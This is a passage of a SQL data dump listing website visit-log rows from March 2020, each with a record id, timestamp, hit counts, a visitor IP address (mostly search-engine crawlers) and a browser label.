,2,0,0,'66.249.64.25','chrome'),(492589,1585351886,6,6,0,0,'66.249.64.24','chrome'),(492590,1585352262,4,4,0,0,'66.249.70.33','chrome'),(492591,1585352283,3,3,0,0,'66.249.64.23','chrome'),(492592,1585352502,1,1,0,0,'66.249.70.36','chrome'),(492593,1585352738,1,0,1,0,'157.55.39.22',''),(492594,1585352857,3,3,0,0,'66.249.64.25','chrome'),(492595,1585352987,1,1,0,0,'54.36.149.74','other'),(492596,1585353526,1,1,0,0,'54.36.149.53','other'),(492597,1585353700,1,1,0,0,'54.36.149.51','other'),(492598,1585353848,1,1,0,0,'178.154.200.222','other'),(492599,1585354001,1,1,0,0,'213.180.203.16','other'),(492600,1585354048,1,1,0,0,'114.98.172.9','chrome'),(492601,1585355269,1,1,0,0,'5.35.48.106','chrome'),(492602,1585355611,1,1,0,0,'66.249.64.25','chrome'),(492603,1585355759,1,0,1,0,'157.55.39.22',''),(492604,1585356200,1,1,0,0,'54.36.149.78','other'),(492605,1585356445,1,1,0,0,'207.46.13.243','other'),(492606,1585356643,1,1,0,0,'54.36.149.6','other'),(492607,1585356747,2,2,0,0,'178.154.200.222','other'),(492608,1585356906,1,1,0,0,'62.205.134.182','other'),(492609,1585356949,1,1,0,0,'183.165.60.220','chrome'),(492610,1585357531,1,1,0,0,'66.249.64.23','chrome'),(492611,1585357547,1,1,0,0,'207.46.13.243','other'),(492612,1585357715,1,1,0,0,'66.249.70.36','chrome'),(492613,1585358234,3,3,0,0,'66.249.64.24','chrome'),(492614,1585358788,2,2,0,0,'178.154.200.222','other'),(492615,1585359023,2,2,0,0,'178.154.171.134','other'),(492616,1585359060,1,1,0,0,'114.99.177.221','chrome'),(492617,1585359165,1,1,0,0,'122.232.219.58','chrome'),(492618,1585359549,2,2,0,0,'66.249.64.24','chrome'),(492619,1585359854,1,1,0,0,'178.154.200.222','other'),(492620,1585360070,1,1,0,0,'54.36.149.99','other'),(492621,1585360077,1,1,0,0,'213.180.203.16','other'),(492622,1585360305,1,1,0,0,'157.55.39.22','other'),(492623,1585360314,1,0,1,0,'66.249.64.23',''),(492624,1585360385,1,1,0,0,'66.249.70.33','chrome'),(492625,1585360496,8,8,0,0,'77.120.98.235','other'),(492626,1585361074,7,7,0,0,'18.234.166.132','firefox'),(492627,1585361321,1,1,0,0,'8.29.198.25','other'),(492628,1585361461,1,1,0,0,'157.55.39.22','other'),(492629,1585361560,2,2,0,0,'66.249.64.23','chrome'),(492630,1585361731,1,1,0,0,'114.238.54.124','chrome'),(492631,1585362080,1,1,0,0,'8.29.198.26','other'),(492632,1585362453,1,1,0,0,'66.249.70.33','chrome'),(492633,1585362601,2,2,0,0,'66.249.64.24','chrome'),(492634,1585362616,1,1,0,0,'66.249.64.23','chrome'),(492635,1585362742,1,1,0,0,'207.46.13.105','other'),(492636,1585363459,1,1,0,0,'213.180.203.16','other'),(492637,1585363501,1,1,0,0,'54.36.149.90','other'),(492638,1585363772,1,1,0,0,'178.154.200.222','other'),(492639,1585364089,1,1,0,0,'66.249.64.23','chrome'),(492640,1585364200,1,1,0,0,'116.248.186.147','chrome'),(492641,1585364230,1,1,0,0,'66.249.64.25','chrome'),(492642,1585364512,3,3,0,0,'66.249.64.24','chrome'),(492643,1585364652,1,1,0,0,'111.178.214.7','chrome'),(492644,1585364906,1,1,0,0,'207.46.13.105','other'),(492645,1585365399,1,1,0,0,'66.249.64.23','chrome'),(492646,1585365512,1,1,0,0,'66.249.64.24','chrome'),(492647,1585365646,1,1,0,0,'178.154.200.222','other'),(492648,1585366800,1,1,0,0,'125.123.136.57','chrome'),(492649,1585366823,1,1,0,0,'66.249.70.38','chrome'),(492650,1585367077,2,2,0,0,'66.249.64.24','chrome'),(492651,1585367342,1,1,0,0,'178.154.200.222','other'),(492652,1585367346,2,2,0,0,'66.249.64.23','chrome'),(492653,1585367391,1,1,0,0,'66.249.70.33','chrome'),(492654,1585367779,1,1,0,0,'54.36.149.97','other'),(492655,1585368203,2,2,0,0,'66.249.64.24','chrome'),(492656,1585368798,1,1,0,0,'157.55.39.22','other'),(492657,1585369021,1,1,0,0,'157.55.39.144','other'),(492658,1585369032,1,1,0,0,'66.249.70.36','chrome'),(492659,1585369549,1,1,0,0,'66.249.64.25','chrome'),(492660,1585369806,2,2,0,0,'178.154.200.222','other'),(492661,1585370144,2,2,0,0,'66.249.64.24','chrome'),(492662,1585370258,1,1,0,0,'66.249.70.33','chrome'),(492663,1585370301,4,4,0,0,'66.249.64.23','chrome'),(492664,1585370877,1,1,0,0,'54.36.149.105','other'),(492665,1585370896,1,1,0,0,'114.100.175.254','chrome'),(492666,1585370990,1,1,0,0,'157.55.39.22','other'),(492667,1585371397,1,1,0,0,'66.249.64.25','chrome'),(492668,1585371532,1,1,0,0,'66.249.64.23','chrome'),(492669,1585371844,1,1,0,0,'66.249.70.33','chrome'),(492670,1585372152,2,2,0,0,'8.29.198.26','other'),(492671,1585372492,1,1,0,0,'54.36.149.47','other'),(492672,1585372636,3,3,0,0,'66.249.64.23','chrome'),(492673,1585372697,1,0,1,0,'66.249.64.25',''),(492674,1585372740,1,1,0,0,'178.154.200.222','other'),(492675,1585372984,1,1,0,0,'66.249.64.25','chrome'),(492676,1585373868,2,2,0,0,'66.249.70.36','chrome'),(492677,1585373974,1,1,0,0,'62.205.134.182','other'),(492678,1585374294,1,1,0,0,'66.249.64.23','chrome'),(492679,1585374769,1,1,0,0,'54.36.149.22','other'),(492680,1585374773,1,1,0,0,'178.154.200.222','other'),(492681,1585374930,1,1,0,0,'66.249.70.38','chrome'),(492682,1585375034,2,2,0,0,'66.70.160.95','msie'),(492683,1585375600,1,1,0,0,'66.249.64.23','chrome'),(492684,1585375652,2,2,0,0,'66.249.64.24','chrome'),(492685,1585375719,1,1,0,0,'91.196.178.1','chrome'),(492686,1585377020,1,1,0,0,'66.249.64.23','chrome'),(492687,1585377709,1,1,0,0,'207.46.13.108','other'),(492688,1585378238,1,1,0,0,'66.249.64.23','chrome'),(492689,1585378287,4,4,0,0,'66.249.64.24','chrome'),(492690,1585378379,2,2,0,0,'66.249.64.25','chrome'),(492691,1585378545,1,1,0,0,'157.55.39.144','other'),(492692,1585379263,8,8,0,0,'77.120.98.235','other'),(492693,1585379268,1,1,0,0,'209.17.96.154','other'),(492694,1585379385,1,1,0,0,'66.249.64.25','chrome'),(492695,1585379443,1,1,0,0,'31.13.127.10','other'),(492696,1585379444,1,1,0,0,'31.13.127.2','other'),(492698,1585379470,1,1,0,0,'66.249.64.24','chrome'),(492699,1585379718,1,1,0,0,'66.249.64.23','chrome'),(492700,1585380306,1,1,0,0,'66.249.64.25','chrome'),(492701,1585380506,1,1,0,0,'66.249.64.24','chrome'),(492702,1585380753,1,1,0,0,'31.13.127.22','other'),(492703,1585380757,1,1,0,0,'31.13.127.4','other'),(492704,1585380758,2,2,0,0,'31.13.127.23','other'),(492705,1585380761,1,1,0,0,'31.13.127.11','other'),(492706,1585380762,1,1,0,0,'31.13.127.12','other'),(492707,1585380794,1,1,0,0,'31.13.127.2','other'),(492708,1585380795,2,2,0,0,'31.13.127.1','other'),(492710,1585381057,2,2,0,0,'178.154.200.222','other'),(492711,1585381099,1,1,0,0,'66.249.70.36','chrome'),(492712,1585381395,1,1,0,0,'207.46.13.108','other'),(492713,1585381525,1,1,0,0,'213.180.203.16','other'),(492714,1585381677,1,1,0,0,'31.13.127.22','other'),(492715,1585381679,1,1,0,0,'31.13.127.16','other'),(492717,1585381694,2,2,0,0,'66.249.64.24','chrome'),(492718,1585382345,3,3,0,0,'157.55.39.144','other'),(492719,1585382484,1,1,0,0,'207.46.13.108','other'),(492720,1585382830,1,1,0,0,'178.154.200.222','other'),(492721,1585382841,1,1,0,0,'66.249.70.38','chrome'),(492722,1585382988,1,1,0,0,'8.29.198.26','other'),(492723,1585383136,2,2,0,0,'66.249.64.25','chrome'),(492724,1585383164,1,1,0,0,'66.249.70.36','chrome'),(492725,1585383745,1,1,0,0,'8.29.198.27','other'),(492726,1585384461,1,1,0,0,'66.249.64.24','chrome'),(492727,1585384938,2,2,0,0,'66.249.64.25','chrome'),(492728,1585384995,1,1,0,0,'178.154.200.222','other'),(492729,1585385927,1,1,0,0,'66.249.70.33','chrome'),(492730,1585386323,1,1,0,0,'213.180.203.16','other'),(492731,1585386719,3,3,0,0,'178.154.200.222','other'),(492732,1585387480,2,2,0,0,'66.249.70.33','chrome'),(492733,1585387544,2,2,0,0,'66.249.64.23','chrome'),(492734,1585388511,1,1,0,0,'66.249.64.24','chrome'),(492735,1585388514,1,1,0,0,'66.249.64.23','chrome'),(492736,1585388565,1,1,0,0,'117.60.49.184','chrome'),(492737,1585389359,2,2,0,0,'66.249.70.33','chrome'),(492738,1585389365,1,1,0,0,'66.249.66.33','chrome'),(492739,1585389567,1,1,0,0,'213.180.203.16','other'),(492740,1585389666,1,1,0,0,'157.55.39.22','other'),(492741,1585390193,1,1,0,0,'113.103.122.115','chrome'),(492742,1585390323,1,1,0,0,'66.249.64.25','chrome'),(492743,1585390548,1,1,0,0,'66.249.64.24','chrome'),(492744,1585391296,1,1,0,0,'106.57.150.55','chrome'),(492745,1585391494,1,1,0,0,'178.154.200.155','other'),(492746,1585391610,2,2,0,0,'66.249.64.24','chrome'),(492747,1585391690,1,1,0,0,'66.249.64.23','chrome'),(492748,1585392514,1,1,0,0,'66.249.70.38','chrome'),(492749,1585392866,3,3,0,0,'66.249.64.25','chrome'),(492750,1585393146,2,2,0,0,'66.249.64.23','chrome'),(492751,1585393417,1,0,1,0,'157.55.39.22',''),(492752,1585393814,1,1,0,0,'8.29.198.25','other'),(492753,1585393820,1,1,0,0,'60.255.77.88','chrome'),(492754,1585394087,1,1,0,0,'66.249.64.25','chrome'),(492755,1585394564,1,1,0,0,'8.29.198.27','other'),(492756,1585395205,1,1,0,0,'207.46.13.108','other'),(492757,1585395310,1,1,0,0,'178.154.200.222','other'),(492758,1585395384,1,1,0,0,'114.99.160.79','chrome'),(492759,1585395532,1,1,0,0,'66.249.64.23','chrome'),(492760,1585396070,1,1,0,0,'91.206.14.227','other'),(492761,1585396461,1,1,0,0,'207.46.13.108','other'),(492762,1585396471,1,1,0,0,'207.46.13.187','other'),(492763,1585396488,1,1,0,0,'157.55.39.22','other'),(492764,1585396555,1,1,0,0,'66.249.64.25','chrome'),(492765,1585396603,1,1,0,0,'66.249.64.24','chrome'),(492766,1585396999,1,1,0,0,'114.238.161.82','chrome'),(492767,1585397034,1,1,0,0,'66.249.64.23','chrome'),(492768,1585397727,3,3,0,0,'178.154.200.222','other'),(492769,1585397890,1,1,0,0,'66.249.70.33','chrome'),(492770,1585398017,1,1,0,0,'117.95.24.224','chrome'),(492771,1585398289,1,1,0,0,'109.74.154.72','chrome'),(492772,1585398290,1,1,0,0,'117.64.148.3','chrome'),(492773,1585398384,2,2,0,0,'66.249.64.23','chrome'),(492774,1585398816,1,1,0,0,'66.249.64.24','chrome'),(492775,1585399076,1,1,0,0,'61.131.148.248','chrome'),(492776,1585399205,2,2,0,0,'66.249.64.25','chrome'),(492777,1585399571,1,1,0,0,'49.87.194.200','chrome'),(492778,1585400470,1,1,0,0,'110.53.234.55','chrome'),(492779,1585400834,1,1,0,0,'66.249.70.38','chrome'),(492780,1585401204,1,1,0,0,'178.133.156.118','chrome'),(492781,1585401443,1,1,0,0,'66.249.64.23','chrome'),(492782,1585401509,2,2,0,0,'66.249.64.25','chrome'),(492783,1585401623,1,1,0,0,'207.46.13.108','other'),(492784,1585401636,1,1,0,0,'157.55.39.22','other'),(492785,1585402123,2,2,0,0,'178.154.200.222','other'),(492786,1585402215,1,1,0,0,'66.249.64.24','chrome'),(492787,1585402236,1,1,0,0,'66.249.70.33','chrome'),(492788,1585402325,8,8,0,0,'77.120.98.235','other'),(492789,1585402427,1,1,0,0,'66.249.64.25','chrome'),(492790,1585402507,1,1,0,0,'91.196.178.186','chrome'),(492791,1585402746,2,2,0,0,'66.249.64.23','chrome'),(492792,1585403720,1,1,0,0,'66.249.64.25','chrome'),(492793,1585403724,1,1,0,0,'178.154.200.87','other'),(492794,1585404115,1,1,0,0,'213.180.203.122','other'),(492795,1585404645,1,1,0,0,'8.29.198.27','other'),(492796,1585404842,1,1,0,0,'66.249.64.23','chrome'),(492797,1585405341,1,1,0,0,'157.55.39.22','other'),(492798,1585405391,1,1,0,0,'8.29.198.25','other'),(492799,1585405616,1,1,0,0,'131.220.6.152','chrome'),(492800,1585406003,1,1,0,0,'207.46.13.108','other'),(492801,1585406074,1,1,0,0,'66.249.64.23','chrome'),(492802,1585406822,3,3,0,0,'66.249.64.25','chrome'),(492803,1585407649,1,1,0,0,'178.154.200.222','other'),(492804,1585407658,1,1,0,0,'66.249.70.36','chrome'),(492805,1585408345,2,2,0,0,'66.249.64.23','chrome'),(492806,1585408394,1,1,0,0,'183.209.57.190','chrome'),(492807,1585409407,2,2,0,0,'66.249.64.25','chrome'),(492808,1585409545,1,1,0,0,'117.60.49.224','chrome'),(492809,1585410193,1,1,0,0,'157.55.39.22','other'),(492810,1585410418,1,1,0,0,'207.46.13.108','other'),(492811,1585410788,2,2,0,0,'66.249.64.24','chrome'),(492812,1585411066,1,1,0,0,'106.57.6.129','chrome'),(492813,1585411225,3,3,0,0,'66.249.64.25','chrome'),(492814,1585411652,2,2,0,0,'66.249.64.23','chrome'),(492815,1585411758,1,1,0,0,'66.249.70.36','chrome'),(492816,1585411836,1,1,0,0,'66.249.64.24','chrome'),(492817,1585413417,1,1,0,0,'178.154.200.222','other'),(492818,1585413422,1,1,0,0,'66.249.64.24','chrome'),(492819,1585413592,1,1,0,0,'66.249.64.25','chrome'),(492820,1585413610,1,1,0,0,'106.117.86.20','chrome'),(492821,1585414624,1,1,0,0,'178.154.200.222','other'),(492822,1585414763,1,0,1,0,'66.249.64.23',''),(492823,1585415023,1,1,0,0,'66.249.64.24','chrome'),(492824,1585415026,1,1,0,0,'66.249.70.33','chrome'),(492825,1585415449,2,2,0,0,'66.249.64.25','chrome'),(492826,1585415471,2,2,0,0,'8.29.198.25','other'),(492827,1585415561,1,1,0,0,'66.249.70.36','chrome'),(492828,1585416414,2,2,0,0,'178.154.200.222','other'),(492829,1585416900,1,1,0,0,'66.249.64.23','chrome'),(492830,1585417029,1,1,0,0,'178.154.200.220','other'),(492831,1585417473,2,2,0,0,'66.249.64.24','chrome'),(492832,1585418021,1,1,0,0,'207.46.13.108','other'),(492833,1585418274,2,2,0,0,'66.249.64.25','chrome'),(492834,1585418516,1,1,0,0,'66.249.64.23','chrome'),(492835,1585418614,1,1,0,0,'46.4.57.115','chrome'),(492836,1585418710,1,1,0,0,'207.46.13.187','other'),(492837,1585420165,1,1,0,0,'66.249.64.25','chrome'),(492838,1585420360,1,1,0,0,'146.120.225.227','chrome'),(492839,1585420452,1,1,0,0,'178.154.200.196','other'),(492840,1585420534,1,1,0,0,'109.197.250.97','chrome'),(492841,1585420738,1,0,1,0,'66.249.64.23',''),(492842,1585420739,4,4,0,0,'66.249.64.24','chrome'),(492843,1585420952,1,1,0,0,'178.154.200.19','other'),(492844,1585421092,1,1,0,0,'66.249.64.25','chrome'),(492845,1585421140,2,2,0,0,'66.249.64.23','chrome'),(492846,1585421554,1,1,0,0,'157.55.39.22','other'),(492847,1585421665,1,1,0,0,'207.46.13.108','other'),(492848,1585421854,1,1,0,0,'178.154.200.222','other'),(492849,1585421907,1,1,0,0,'66.249.64.24','chrome'),(492850,1585422091,1,1,0,0,'66.249.64.25','chrome'),(492851,1585422845,3,3,0,0,'66.249.70.38','chrome'),(492852,1585423108,2,2,0,0,'66.249.64.25','chrome'),(492853,1585423298,1,1,0,0,'173.252.111.17','other'),(492854,1585423299,1,1,0,0,'173.252.111.5','other'),(492855,1585424481,1,1,0,0,'66.249.64.23','chrome'),(492856,1585424561,1,1,0,0,'173.252.111.3','other'),(492857,1585424562,1,1,0,0,'173.252.111.4','other'),(492858,1585424624,1,1,0,0,'66.249.64.24','chrome'),(492859,1585424946,1,1,0,0,'157.55.39.22','other'),(492860,1585425487,1,0,1,0,'207.46.13.187',''),(492861,1585426297,1,1,0,0,'8.29.198.27','other'),(492862,1585426407,1,1,0,0,'207.46.13.187','other'),(492863,1585426542,3,3,0,0,'66.249.64.25','chrome'),(492864,1585426549,2,2,0,0,'66.249.70.36','chrome'),(492865,1585426697,2,2,0,0,'66.249.64.23','chrome'),(492866,1585426882,2,2,0,0,'178.154.200.196','other'),(492867,1585427038,1,1,0,0,'8.29.198.25','other'),(492868,1585427364,1,1,0,0,'66.249.64.24','chrome'),(492869,1585427771,2,2,0,0,'178.154.200.222','other'),(492870,1585428674,2,2,0,0,'66.249.64.23','chrome'),(492871,1585429347,2,2,0,0,'66.249.64.24','chrome'),(492872,1585429602,2,2,0,0,'66.249.64.23','chrome'),(492873,1585429913,2,2,0,0,'66.249.64.25','chrome'),(492874,1585430033,1,1,0,0,'66.249.70.33','chrome'),(492875,1585430621,2,2,0,0,'66.249.64.24','chrome'),(492876,1585430786,3,3,0,0,'66.249.64.23','chrome'),(492877,1585431082,1,1,0,0,'66.249.64.25','chrome'),(492878,1585432266,1,1,0,0,'66.249.70.36','chrome'),(492879,1585432366,1,1,0,0,'207.46.13.187','other'),(492880,1585432470,1,1,0,0,'66.249.70.38','chrome'),(492881,1585432568,3,3,0,0,'66.249.64.23','chrome'),(492882,1585432573,1,1,0,0,'66.249.64.24','chrome'),(492883,1585432647,1,1,0,0,'66.249.64.25','chrome'),(492884,1585433357,8,8,0,0,'77.120.98.235','other'),(492885,1585433858,2,2,0,0,'66.249.70.36','chrome'),(492886,1585433909,4,4,0,0,'66.249.64.24','chrome'),(492887,1585434369,1,1,0,0,'66.249.70.33','chrome'),(492888,1585434407,2,2,0,0,'66.249.64.23','chrome'),(492889,1585434560,1,1,0,0,'157.55.39.22','other'),(492890,1585434673,1,1,0,0,'106.57.6.68','chrome'),(492891,1585435220,2,2,0,0,'66.249.64.24','chrome'),(492892,1585435372,1,1,0,0,'178.154.200.222','other'),(492893,1585435549,1,1,0,0,'119.140.185.233','chrome'),(492894,1585435580,2,2,0,0,'66.249.64.23','chrome'),(492895,1585436339,1,1,0,0,'66.249.64.25','chrome'),(492896,1585436612,2,2,0,0,'207.46.13.187','other'),(492897,1585436678,1,1,0,0,'66.249.64.23','chrome'),(492898,1585437123,1,1,0,0,'8.29.198.27','other'),(492899,1585437811,1,1,0,0,'66.249.70.38','chrome'),(492900,1585437859,1,1,0,0,'8.29.198.26','other'),(492901,1585438272,1,1,0,0,'114.235.158.74','chrome'),(492902,1585438456,1,1,0,0,'66.249.64.24','chrome'),(492903,1585438540,1,1,0,0,'66.249.64.23','chrome'),(492904,1585438754,1,1,0,0,'123.179.128.93','chrome'),(492905,1585439100,3,3,0,0,'66.249.64.25','chrome'),(492906,1585439431,1,1,0,0,'117.69.129.39','chrome'),(492907,1585439526,3,3,0,0,'66.249.64.24','chrome'),(492908,1585439574,2,2,0,0,'66.249.70.38','chrome'),(492909,1585440109,2,2,0,0,'66.249.70.33','chrome'),(492910,1585440138,1,1,0,0,'3.87.229.62','chrome'),(492911,1585440297,3,3,0,0,'66.249.64.23','chrome'),(492912,1585440460,1,1,0,0,'66.249.64.25','chrome'),(492913,1585440536,1,1,0,0,'66.249.64.24','chrome'),(492914,1585440815,1,1,0,0,'195.149.108.45','chrome'),(492915,1585441253,2,2,0,0,'66.249.64.23','chrome'),(492916,1585441859,2,2,0,0,'66.249.64.24','chrome'),(492917,1585442771,2,2,0,0,'66.249.64.24','chrome'),(492918,1585443062,1,1,0,0,'182.244.164.249','chrome'),(492919,1585443305,1,1,0,0,'62.205.134.182','other'),(492920,1585443467,1,1,0,0,'66.249.70.38','chrome'),(492921,1585443587,1,1,0,0,'157.55.39.22','other'),(492922,1585443713,1,1,0,0,'182.244.168.37','chrome'),(492923,1585443901,1,1,0,0,'66.249.64.23','chrome'),(492924,1585443992,1,1,0,0,'66.249.70.33','chrome'),(492925,1585444158,2,2,0,0,'66.249.64.25','chrome'),(492926,1585444386,2,2,0,0,'66.249.64.24','chrome'),(492927,1585445314,3,2,1,0,'207.46.13.187',''),(492928,1585445386,1,1,0,0,'66.249.64.25','chrome'),(492929,1585445390,2,2,0,0,'66.249.64.24','chrome'),(492930,1585445703,2,2,0,0,'157.55.39.22','other'),(492931,1585446277,1,1,0,0,'66.249.64.23','chrome'),(492932,1585446315,1,1,0,0,'209.160.107.145','chrome'),(492933,1585446327,1,1,0,0,'182.247.61.108','chrome'),(492934,1585446539,2,2,0,0,'66.249.64.24','chrome'),(492935,1585447279,1,1,0,0,'36.36.82.25','chrome'),(492936,1585447544,1,1,0,0,'66.249.64.23','chrome'),(492937,1585447763,1,1,0,0,'109.70.106.130','other'),(492938,1585447948,1,1,0,0,'8.29.198.26','other'),(492939,1585448506,1,1,0,0,'42.242.11.176','chrome'),(492940,1585448620,1,1,0,0,'66.249.64.23','chrome'),(492941,1585448667,1,1,0,0,'209.160.107.145','chrome'),(492942,1585448682,1,1,0,0,'8.29.198.27','other'),(492943,1585449305,1,1,0,0,'223.241.22.26','chrome'),(492944,1585449308,1,1,0,0,'60.160.143.103','chrome'),(492945,1585449627,1,1,0,0,'207.46.13.187','other'),(492946,1585449729,1,1,0,0,'112.113.152.254','chrome'),(492947,1585450798,1,1,0,0,'42.242.10.175','chrome'),(492948,1585451612,1,1,0,0,'207.46.13.187','other'),(492949,1585452254,3,3,0,0,'34.67.94.111','chrome'),(492950,1585452266,3,3,0,0,'104.198.177.27','chrome'),(492951,1585452275,1,1,0,0,'34.67.24.81','chrome'),(492952,1585452276,6,6,0,0,'34.67.24.81','chrome'),(492953,1585452297,2,2,0,0,'35.184.105.199','chrome'),(492955,1585452864,1,1,0,0,'66.249.64.23','chrome'),(492956,1585452894,1,1,0,0,'218.73.117.234','chrome'),(492957,1585452991,1,1,0,0,'27.194.134.220','chrome'),(492958,1585452998,1,1,0,0,'36.41.163.37','chrome'),(492959,1585453473,1,1,0,0,'66.249.70.36','chrome'),(492960,1585454638,1,1,0,0,'182.32.78.213','chrome'),(492961,1585454772,1,1,0,0,'112.65.52.194','chrome'),(492962,1585454918,2,0,2,0,'66.249.64.23',''),(492963,1585455209,1,1,0,0,'111.75.240.243','chrome'),(492964,1585455605,1,1,0,0,'207.46.13.187','other'),(492965,1585455695,8,8,0,0,'77.120.98.235','other'),(492966,1585456913,1,1,0,0,'62.205.134.182','other'),(492967,1585456930,1,1,0,0,'66.249.64.23','chrome'),(492968,1585457829,1,1,0,0,'124.127.74.49','chrome'),(492969,1585457844,1,1,0,0,'223.64.181.14','chrome'),(492970,1585458774,2,2,0,0,'8.29.198.27','other'),(492971,1585458944,1,1,0,0,'66.249.64.24','chrome'),(492972,1585460308,1,1,0,0,'207.46.13.187','other'),(492973,1585461049,1,1,0,0,'66.249.64.25','chrome'),(492974,1585461062,1,1,0,0,'66.249.70.38','chrome'),(492975,1585462020,1,1,0,0,'66.249.64.24','chrome'),(492976,1585462348,1,1,0,0,'207.46.13.187','other'),(492977,1585463676,1,1,0,0,'91.196.177.97','chrome'),(492978,1585463855,1,1,0,0,'106.57.6.139','chrome'),(492979,1585463908,1,1,0,0,'66.249.64.25','chrome'),(492980,1585464064,3,3,0,0,'66.249.64.23','chrome'),(492981,1585465327,1,1,0,0,'66.249.64.24','chrome'),(492982,1585465329,2,2,0,0,'66.249.64.23','chrome'),(492983,1585465908,1,1,0,0,'125.126.218.147','chrome'),(492984,1585466499,1,1,0,0,'157.55.39.22','other'),(492985,1585466558,1,1,0,0,'66.249.64.24','chrome'),(492986,1585466767,1,0,1,0,'66.249.64.23',''),(492987,1585466996,1,1,0,0,'117.66.235.170','chrome'),(492988,1585467258,1,1,0,0,'66.249.64.25','chrome'),(492989,1585467404,1,1,0,0,'178.154.200.222','other'),(492990,1585468506,1,1,0,0,'111.196.8.205','chrome'),(492991,1585468531,3,3,0,0,'178.154.200.222','other'),(492992,1585468622,1,1,0,0,'66.249.64.24','chrome'),(492993,1585468794,1,1,0,0,'218.62.233.218','chrome'),(492994,1585469457,1,1,0,0,'66.249.64.23','chrome'),(492995,1585469487,2,2,0,0,'178.154.200.222','other'),(492996,1585469604,1,1,0,0,'8.29.198.26','other'),(492997,1585469738,1,1,0,0,'106.111.13.62','chrome'),(492998,1585469757,1,1,0,0,'58.209.241.48','chrome'),(492999,1585469780,1,1,0,0,'163.179.219.50','chrome'),(493000,1585470045,1,1,0,0,'66.249.64.25','chrome'),(493001,1585470336,1,1,0,0,'8.29.198.27','other'),(493002,1585470424,1,1,0,0,'91.196.178.101','chrome'),(493003,1585470426,4,4,0,0,'66.249.64.24','chrome'),(493004,1585470531,1,1,0,0,'66.249.70.33','chrome'),(493005,1585470602,3,3,0,0,'66.249.64.23','chrome'),(493006,1585470683,1,1,0,0,'206.189.117.9','msie'),(493007,1585470785,2,2,0,0,'178.154.200.222','other'),(493008,1585471342,1,1,0,0,'213.180.203.16','other'),(493009,1585471713,1,1,0,0,'113.138.132.239','chrome'),(493010,1585471995,1,1,0,0,'125.123.136.199','chrome'),(493011,1585472005,1,1,0,0,'223.215.177.13','chrome'),(493012,1585472473,2,2,0,0,'178.154.200.222','other'),(493013,1585473149,1,1,0,0,'66.249.64.24','chrome'),(493014,1585473221,1,1,0,0,'49.87.175.154','chrome'),(493015,1585473787,1,1,0,0,'114.101.247.160','chrome'),(493016,1585474492,1,1,0,0,'66.249.64.24','chrome'),(493017,1585474680,1,1,0,0,'114.96.169.252','chrome'),(493018,1585475238,1,1,0,0,'114.238.154.3','chrome'),(493019,1585476166,1,1,0,0,'66.249.64.23','chrome'),(493020,1585476274,1,1,0,0,'178.154.200.222','other'),(493021,1585476292,2,2,0,0,'91.196.178.76','chrome'),(493022,1585476656,1,1,0,0,'60.166.117.221','chrome'),(493023,1585477181,1,1,0,0,'46.211.64.52','chrome'),(493024,1585477369,1,1,0,0,'207.46.13.187','other'),(493025,1585477666,1,1,0,0,'66.249.64.23','chrome'),(493026,1585478083,1,1,0,0,'46.211.64.52','chrome'),(493027,1585478102,1,1,0,0,'178.154.200.222','other'),(493028,1585478372,2,2,0,0,'173.252.111.22','other'),(493029,1585478376,1,1,0,0,'173.252.111.3','other'),(493030,1585478377,1,1,0,0,'173.252.111.10','other'),(493031,1585478378,1,1,0,0,'173.252.111.18','other'),(493032,1585478784,1,1,0,0,'66.249.64.25','chrome'),(493033,1585479006,8,8,0,0,'77.120.98.235','other'),(493034,1585479036,2,2,0,0,'46.219.206.8','chrome'),(493035,1585479159,1,1,0,0,'91.196.178.176','chrome'),(493036,1585479336,3,3,0,0,'207.46.13.187','other'),(493037,1585479467,2,2,0,0,'195.201.201.32','other'),(493038,1585479479,1,1,0,0,'94.130.167.247','chrome'),(493039,1585479506,1,1,0,0,'66.249.70.38','chrome'),(493040,1585479630,1,1,0,0,'178.154.200.222','other'),(493041,1585480179,1,1,0,0,'175.165.228.180','chrome'),(493042,1585480328,1,1,0,0,'46.219.206.8','chrome'),(493043,1585480429,1,1,0,0,'8.29.198.25','other'),(493044,1585480756,2,2,0,0,'66.249.64.25','chrome'),(493045,1585480785,1,1,0,0,'66.249.64.23','chrome'),(493046,1585481149,1,1,0,0,'157.55.39.22','other'),(493047,1585481163,1,1,0,0,'8.29.198.26','other'),(493048,1585481404,1,1,0,0,'46.219.206.8','chrome'),(493049,1585481481,1,1,0,0,'109.74.154.72','chrome'),(493050,1585481723,1,1,0,0,'213.180.203.16','other'),(493051,1585481823,1,1,0,0,'178.154.200.222','other'),(493052,1585482360,1,1,0,0,'91.196.178.27','chrome'),(493053,1585482576,1,1,0,0,'66.249.64.24','chrome'),(493054,1585482644,2,2,0,0,'46.219.206.8','chrome'),(493055,1585482974,1,1,0,0,'157.55.39.22','other'),(493056,1585483076,1,1,0,0,'66.249.70.36','chrome'),(493057,1585483162,1,1,0,0,'178.154.200.222','other'),(493058,1585483525,1,1,0,0,'193.106.30.99','firefox'),(493059,1585483565,1,1,0,0,'46.219.206.8','chrome'),(493060,1585483683,1,1,0,0,'66.249.64.25','chrome'),(493061,1585484088,1,1,0,0,'66.249.64.23','chrome'),(493062,1585484569,1,1,0,0,'213.180.203.16','other'),(493063,1585485264,1,1,0,0,'131.220.6.152','chrome'),(493064,1585485330,1,1,0,0,'66.249.70.36','chrome'),(493065,1585486462,1,1,0,0,'157.55.39.22','other'),(493066,1585486674,1,1,0,0,'66.249.64.24','chrome'),(493067,1585486828,1,1,0,0,'207.46.13.187','other'),(493068,1585488037,1,1,0,0,'66.249.70.33','chrome'),(493069,1585488735,3,3,0,0,'66.249.64.24','chrome'),(493070,1585488857,1,1,0,0,'207.46.13.187','other'),(493071,1585489205,1,1,0,0,'18.191.207.220','chrome'),(493072,1585489733,1,1,0,0,'66.249.64.24','chrome'),(493073,1585490036,1,1,0,0,'66.249.70.38','chrome'),(493074,1585490722,1,1,0,0,'66.249.64.23','chrome'),(493075,1585491252,2,2,0,0,'8.29.198.27','other'),(493076,1585491423,1,1,0,0,'182.32.115.8','chrome'),(493077,1585491516,1,1,0,0,'85.249.44.46','chrome'),(493078,1585491699,1,1,0,0,'60.166.117.155','chrome'),(493079,1585492130,7,7,0,0,'185.136.167.162','other'),(493080,1585492442,1,1,0,0,'66.249.70.36','chrome'),(493081,1585492811,1,1,0,0,'116.248.187.148','chrome'),(493082,1585493453,2,2,0,0,'66.249.64.24','chrome'),(493083,1585493707,1,1,0,0,'46.211.33.58','chrome'),(493084,1585494133,1,1,0,0,'66.249.64.23','chrome'),(493085,1585495262,1,1,0,0,'106.57.151.194','chrome'),(493086,1585495698,1,0,1,0,'207.46.13.187',''),(493087,1585496301,1,1,0,0,'119.5.189.48','chrome'),(493088,15854